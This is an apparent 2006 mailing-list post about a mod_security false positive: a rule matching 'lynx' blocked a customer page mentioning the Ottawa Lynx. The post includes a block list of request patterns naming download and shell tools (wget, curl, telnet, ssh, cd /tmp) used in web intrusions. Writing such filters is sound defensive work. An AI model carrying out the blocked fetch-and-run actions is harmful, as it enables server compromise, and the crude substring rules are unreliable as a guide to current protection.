|
From: Jamie K. <jkr...@gm...> - 2006-03-06 18:46:16
|
I was going through the audit logs thismorning and found that a page
of a customer of mine was being blocked by mod_sec for no good reson
other than the fact that the parameters contained lynx (Ottawa-Lynx to
be exact). I doubt that there would be any other conflicts with linux
programs when it comes to sports teams. As you can see I modified the
rule for lynx to make sure it doesn't match a "-" in front of it. Am I
opening up my server to an attack if someone does somthing clever? How
would I make sure something doesn't get rejected if nothing malicous
was intended?
Thanks,
Jamie
---------------------------------------------------------------------------=
----------------------------------------------------
# Block various methods of downloading files to a server
SecFilterSelective THE_REQUEST "wget "
SecFilterSelective THE_REQUEST "[^-]lynx "
SecFilterSelective THE_REQUEST "scp "
SecFilterSelective THE_REQUEST "ftp "
SecFilterSelective THE_REQUEST "cvs "
SecFilterSelective THE_REQUEST "rcp "
SecFilterSelective THE_REQUEST "curl "
SecFilterSelective THE_REQUEST "telnet "
SecFilterSelective THE_REQUEST "ssh "
SecFilterSelective THE_REQUEST "echo "
SecFilterSelective THE_REQUEST "links -dump "
SecFilterSelective THE_REQUEST "links -dump-charset "
SecFilterSelective THE_REQUEST "links -dump-width "
SecFilterSelective THE_REQUEST "links http:// "
SecFilterSelective THE_REQUEST "links ftp:// "
SecFilterSelective THE_REQUEST "links -source "
SecFilterSelective THE_REQUEST "mkdir "
SecFilterSelective THE_REQUEST "cd /tmp "
SecFilterSelective THE_REQUEST "cd /var/tmp "
SecFilterSelective THE_REQUEST "cd /etc/httpd/proxy "
|
